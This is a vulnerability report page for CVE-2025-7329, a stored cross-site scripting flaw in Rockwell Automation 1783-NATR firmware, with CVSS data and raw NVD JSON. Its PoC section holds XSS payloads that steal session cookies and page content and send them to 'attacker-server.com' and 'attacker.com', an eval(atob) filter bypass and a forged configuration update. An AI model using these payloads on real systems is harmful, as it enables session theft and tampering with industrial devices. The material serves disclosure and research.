Security Vulnerability Report
CVE-2025-7329 CVSS 4.8 MEDIUM

CVE-2025-7329

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-30 21:43:58

Description

A Stored Cross-Site Scripting security issue exists in the affected product that could potentially allow a malicious user to view and modify sensitive data or make the webpage unavailable. The vulnerability stems from missing special character filtering and encoding. Successful exploitation requires an attacker to be able to update configuration fields behind admin login.

CVSS Details

CVSS Score: 4.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation related products (for the specific versions, refer to the official security advisory SD1756)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Stored XSS PoC for CVE-2025-7329 -->
<!-- This PoC demonstrates the stored XSS vulnerability in Rockwell Automation product configuration fields -->

<!-- Step 1: Attacker (with admin privileges) injects malicious script into a configuration field -->
<!-- The payload is stored in the configuration field without proper sanitization -->
<script>
// Malicious JavaScript payload

// Steal session cookies
var cookie = document.cookie;

// Exfiltrate sensitive data
var img = new Image();
img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie) + "&data=" + encodeURIComponent(document.body.innerHTML);

// Modify page content
document.body.innerHTML = "<h1>Page Modified by Attacker</h1>";

// Perform unauthorized actions via fetch
fetch('/api/config/update', {
  method: 'POST',
  headers: {'Content-Type': 'application/json'},
  body: JSON.stringify({config: 'malicious_value'})
});
</script>

<!-- Alternative payloads that bypass basic filters -->
<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">
<svg onload="alert(document.domain)">
<body onload="eval(atob('base64_encoded_payload'))">

<!-- Step 2: When another admin views the configuration page, the stored script executes automatically -->
<!-- The malicious script can:
     1. Steal session cookies and authentication tokens
     2. Modify sensitive configuration data
     3. Make the webpage unavailable (DoS)
     4. Perform actions on behalf of the victim user
-->

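References

https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html (Vendor Advisory)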

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7329", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.157", "lastModified": "2025-10-30T21:43:57.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting security issue exists in the affected product that could potentially allow a malicious user to view and modify sensitive data or make the webpage unavailable. The vulnerability stems from missing special character filtering and encoding. Successful exploitation requires an attacker to be able to update configuration fields behind admin login."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": 
"NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.007", "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}